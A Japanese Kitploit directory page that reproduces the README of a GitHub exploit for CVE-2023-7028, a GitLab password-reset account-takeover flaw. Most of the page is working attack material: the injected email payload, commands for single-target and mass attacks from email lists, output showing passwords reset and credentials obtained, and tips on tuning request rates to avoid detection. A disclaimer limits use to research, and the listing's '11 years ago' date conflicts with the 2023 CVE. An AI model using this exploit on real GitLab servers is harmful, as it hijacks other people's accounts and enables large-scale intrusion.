Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-7028 — このリポジトリのFORKは、CVE-2023-7028の概念実証を示しています。私はエクスプロイトの使用法を改善しただけです。 | Kitploit
ツール/GitHubGitHub/szybnev/cve-2023-7028
パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubszybnev/cve-2023-7028

CVE-2023-7028

このリポジトリのFORKは、CVE-2023-7028の概念実証を示しています。私はエクスプロイトの使用法を改善しただけです。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-7028 | Gitlab アカウント乗っ取り

免責事項

このコードは脆弱性の概念実証です。自身が所有していない GitLab インスタンスでの使用を推奨するものではありません。 このツールは研究および教育目的のみで開発されており、利用によるいかなる結果に対しても責任を負いません。

説明

これはリポジトリ https://github.com/Vozec/CVE-2023-7028 のフォークです。エクスプロイトの使用方法を改善したものです。

CVE-2023-7028 は、ユーザーの操作なしに GitLab 管理者アカウントを乗っ取ることを可能にするアカウント乗っ取り脆弱性です。

この脆弱性は、パスワードリセット時のメール管理にあります。攻撃者は2つのメールアドレスを指定でき、リセットコードが両方に送信されます。 そのため、対象アカウントのメールアドレスと攻撃者のメールアドレスの両方を指定し、管理者パスワードをリセットすることが可能です。 (GitLab は、2要素認証がこの脆弱性の悪用を防ぐと指摘しています。パスワードをリセットしても、攻撃者はログインできないためです。)

この脆弱性は asterion04 によって発見されました。

ペイロード

以下はペイロードの例です

root@kitploit:~
user[email][][email protected]&user[email][][email protected]

POC

方法1: 一時メールを使用 (単一ターゲット)

root@kitploit:~
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t [email protected]

[DEBUG] Getting temporary mail
[DEBUG] Scrapping available domains on 1secmail.com
[DEBUG] 8 domains found
[DEBUG] Temporary mail: [email protected]
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = bc91lpzwTOaY9dg5SWjLvvDDb61j6ZunCX4DXYlSnWz9Y3zK35SPiLNShhrDrPVDgY_AzQjzpD5qVt2WXeolog
[DEBUG] Sending reset password request
[DEBUG] Emails sended to [email protected] and [email protected] !
[DEBUG] Waiting mail, sleeping for 7.5 seconds
[DEBUG] Getting link using temp-mail | Try N°1 on 5
[DEBUG] Getting last mail for [email protected]
[DEBUG] 1 mail(s) found
[DEBUG] Reading the last one
[DEBUG] Generating new password
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = RN6gypVz7Zxtu2zRsJmKPsDHNumIH_UPvdn7aQoWRBnUcqmW1hcu8kYcMvI6XbTDsYuZieMFypbe8SWi3q781w
[DEBUG] Changing password to l3mG2v2XN4UBzbN18ZkW
[DEBUG] CVE_2023_7028 succeed !
        You can connect on https://gitlab.example.com/users/sign_in
        Username: [email protected]
        Password: l3mG2v2XN4UBzbN18ZkW

方法2: 悪意のあるメールを使用 (単一ターゲット)

root@kitploit:~
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t [email protected] -e [email protected]

[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = 1Yt1EUeWSL-oiSV7v1Z6ghdCDG3w0FFCQB8Uc5B5GAodVNJ26OlPT8HtYYleGXB9F0otas3gnHOtRfhFall8pQ
[DEBUG] Sending reset password request
[DEBUG] Emails sended to [email protected] and [email protected] !
        Input link received by mail: https://gitlab.example.com/users/password/edit?reset_password_token=U8PSU7DXdebdTD3GjMiX
[DEBUG] Generating new password
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = N7gs43C9ZMxdniA9UEzzfH2Rlhgejt75M1Kw88vaarP_Z4uE38JjPDT6ZM-xA_mDfZm3HyO-E8jeCFzFMfoOHA
[DEBUG] Changing password to EU7XIYjlawjb5tH2jgmU
[DEBUG] CVE_2023_7028 succeed !
        You can connect on https://gitlab.example.com/users/sign_in
        Username: [email protected]
        Password: EU7XIYjlawjb5tH2jgmU

方法3: ファイルからのメールリストを使用

root@kitploit:~
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l emails.txt

[DEBUG] Loaded 806 emails from emails.txt
[DEBUG] Starting full attacks on 806 target(s) with rate limit 10 rps
[DEBUG] Processing target 1/806: [email protected]
[DEBUG] Getting temporary mail
[DEBUG] Scrapping available domains on 1secmail.com
[DEBUG] 8 domains found
[DEBUG] Temporary mail: [email protected]
[DEBUG] Reset request sent successfully for [email protected]
...
[DEBUG] Attack completed: 800/806 requests sent, 750/806 passwords reset

方法4: スキップモード - リセットリクエストのみ送信 (高速)

root@kitploit:~
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l emails.txt --skip -rps 20

[DEBUG] Loaded 806 emails from emails.txt
[DEBUG] Starting reset requests on 806 target(s) with rate limit 20 rps
[DEBUG] Processing target 1/806: [email protected]
[DEBUG] Reset request sent successfully for [email protected]
[DEBUG] Processing target 2/806: [email protected]
[DEBUG] Reset request sent successfully for [email protected]
...
[DEBUG] Reset requests completed: 800/806 successful

ヘルプ

root@kitploit:~
$ python3 ./CVE-2023-7028.py -h
usage: CVE-2023-7028.py [-h] -u URL (-t TARGET | -l EMAIL_LIST) [-e EVIL] [-p PASSWORD] [--skip] [-rps RATE_LIMIT]

This tool automates CVE-2023-7028 on gitlab

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Gitlab url
-t TARGET, --target TARGET
Target email
-l EMAIL_LIST, --list EMAIL_LIST
File with target emails list
-e EVIL, --evil EVIL Evil email
-p PASSWORD, --password PASSWORD
Password
--skip Skip password reset, only send reset requests
-rps RATE_LIMIT, --rate RATE_LIMIT
Requests per second (default: 10)

使用上の注意

  • 単一ターゲット: -t パラメータを使用して単一のメールアドレスを攻撃
  • 複数ターゲット: -l パラメータを使用してファイルからメールアドレスを読み込み (1行1アドレス)
  • 悪意のあるメール: --evil オプションなしの場合、スクリプトは公開の一時メールを使用してリセットリンクを探します (ペンテスト中は注意)
  • スキップモード: --skip を使用すると、パスワードリセットを待たずにリセットリクエストのみ送信 (大量攻撃で高速)
  • レート制限: -rps で1秒あたりのリクエスト数を制御 (デフォルト: 10)。値が大きいほど高速ですが、検出されやすくなります
  • メールリスト形式: 1行に1メールアドレスのプレーンテキストファイル

例

root@kitploit:~
# カスタムパスワードでの単一ターゲット
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t [email protected] -p MyCustomPass123

# 低速レート制限での大量攻撃
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l targets.txt -rps 5

# 高速偵察 - リセットリクエストのみ送信
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l targets.txt --skip -rps 50

影響を受けるバージョン

  • 16.1 to 16.1.5
  • 16.2 to 16.2.8
  • 16.3 to 16.3.6
  • 16.4 to 16.4.4
  • 16.5 to 16.5.5
  • 16.6 to 16.6.3
  • 16.7 to 16.7.1

参考文献

  • https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
  • https://docs.gitlab.com/ee/install/docker.html
  • https://www.cert.ssi.gouv.fr/avis/CERTFR-2024-AVI-0030/
ツールをダウンロード